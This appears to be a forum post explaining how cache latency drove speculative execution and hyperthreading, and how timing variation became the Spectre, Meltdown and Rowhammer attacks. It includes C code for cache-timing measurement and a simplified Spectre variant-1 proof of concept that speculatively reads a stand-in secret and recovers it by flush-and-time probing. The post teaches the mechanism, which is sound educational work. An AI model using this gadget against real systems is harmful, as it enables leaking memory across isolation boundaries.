Basically this was known about years ago, as far back as an erratum in a datasheet on the superscalar architecture: branch latency became variable thanks to speculative execution, branch prediction, and the other fun things done with caching. The core had become so fast that waiting for the (relatively) slow L2 cache to answer a memory access request could burn 100 or more clock cycles that might otherwise be doing useful work, and a miss that had to go all the way out to main memory cost on the order of 1000 cycles; to the processor that is an eternity of waiting for the first bytes to arrive, and then another eternity for the rest of the cache line. Hence the push to use all that otherwise wasted time: first a prediction algorithm to drive out-of-order execution, branch prediction, and speculative execution during the wait; then extra cache space and controllers to hold all the data those speculative paths pulled in before it got discarded; and finally the realization that a duplicate set of those buffers plus a little extra logic gave you a virtual processor that could run while the first thread was stalled waiting on L2 or main memory, so you could put hyperthreads on the same silicon with minimal overhead in most cases.
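To make that latency gap concrete, here is a small, hedged C sketch (x86-64 with the GCC/Clang intrinsics `__rdtscp`, `_mm_clflush`, and `_mm_mfence`; the buffer and specific numbers are my own illustrative choices, not anything from a datasheet) that times a load that hits the cache against the same load after its line has been flushed:

```c
#include <stdio.h>
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_clflush, _mm_mfence */

/* Time a single load of *p in TSC ticks. The fences keep the timed load
   from drifting outside the two timestamp reads. */
static uint64_t time_load(volatile uint8_t *p)
{
    unsigned aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*p;                     /* the load being measured */
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}

int main(void)
{
    static uint8_t buf[4096];

    buf[0] = 1;                   /* touch it: now almost certainly in L1 */
    uint64_t hit = time_load(&buf[0]);

    _mm_clflush(&buf[0]);         /* evict the line: next load goes out to DRAM */
    _mm_mfence();
    uint64_t miss = time_load(&buf[0]);

    printf("cached load:   ~%llu ticks\n", (unsigned long long)hit);
    printf("flushed load:  ~%llu ticks\n", (unsigned long long)miss);
    return 0;
}
```

On a typical desktop part the flushed load comes back tens to a few hundred ticks slower than the cached one, and that software-visible gap is exactly the signal the attacks below turn into leaked data.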
All this means that execution time per instruction depends on what else is going on around it, and for years that was treated as just an annoyance because it broke simple delay loops as a timing standard (older x86 code had a predictable number of cycles per instruction, so a loop took a known amount of time). Then fairly recently somebody looked at that again and realized that if the timing depends on what happens around a thread, information can leak out through it. Hence Spectre and Meltdown, and before them Rowhammer, which revisited an old known weakness in memory: induce enough noise into a cell by hammering it, and the local reference rails rise far enough to flip bits in adjacent cells of memory.
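For anyone who wants to see what "timing depends on what happens around the thread" buys an attacker, below is a heavily simplified sketch of the Spectre variant-1 (bounds-check bypass) gadget shape in C. This is not a working exploit; the array names, training loop, and single-shot measurement are my own illustrative choices, and real proofs of concept need careful mistraining, averaging, and noise filtering. It only shows how a speculatively executed out-of-bounds read can deposit a secret-dependent line into the cache, which the timing trick above can then detect.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Victim side: the classic variant-1 gadget shape. If the branch predictor
   has been trained to expect "x < array1_size", the core may speculatively
   run the body even for an out-of-bounds x, and the dependent array2 access
   leaves a secret-dependent line in the cache before the speculation is
   rolled back. */
#define PROBE_STRIDE 512          /* one probe slot per possible byte value */

uint8_t  array1[16];
size_t   array1_size = 16;
uint8_t  array2[256 * PROBE_STRIDE];
const char *secret = "hunter2";   /* stand-in for data the attacker cannot read directly */
uint8_t  temp;                    /* keeps the compiler from dropping the probe load */

void victim(size_t x)
{
    if (x < array1_size) {                    /* architecturally enforced...      */
        uint8_t v = array1[x];                /* ...but speculatively bypassed    */
        temp &= array2[v * PROBE_STRIDE];     /* secret-dependent cache footprint */
    }
}

/* Attacker side: flush the probe array, train the branch with in-bounds calls,
   hand the victim an out-of-bounds x that reaches the secret, then time every
   probe slot -- the one slot that comes back fast names the leaked byte. */
int probe_one_byte(size_t out_of_bounds_x)
{
    for (int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * PROBE_STRIDE]);

    for (size_t t = 0; t < 32; t++)
        victim(t % array1_size);              /* mistrain: branch "always" in bounds */

    _mm_clflush(&array1_size);                /* make the bounds check slow to resolve */
    _mm_mfence();
    victim(out_of_bounds_x);                  /* speculative out-of-bounds read */

    int best = -1;
    uint64_t best_time = UINT64_MAX;
    for (int i = 0; i < 256; i++) {
        unsigned aux;
        volatile uint8_t *p = &array2[i * PROBE_STRIDE];
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        if (t1 - t0 < best_time) { best_time = t1 - t0; best = i; }
    }
    return best;
}

int main(void)
{
    /* Same trick as the classic PoC: express the secret's address as an
       out-of-bounds index into array1 (technically undefined behaviour,
       but that is the point). */
    size_t offset = (size_t)(secret - (const char *)array1);
    int guess = probe_one_byte(offset);
    printf("guessed first secret byte: %d ('%c'?)\n", guess, guess);
    return 0;
}
```

It will not recover the byte reliably on mitigated or noisy systems, but the structure (mistrain, flush, speculate, then time the probe array) is the whole story: the speculative work is thrown away architecturally, yet its cache side effects remain measurable.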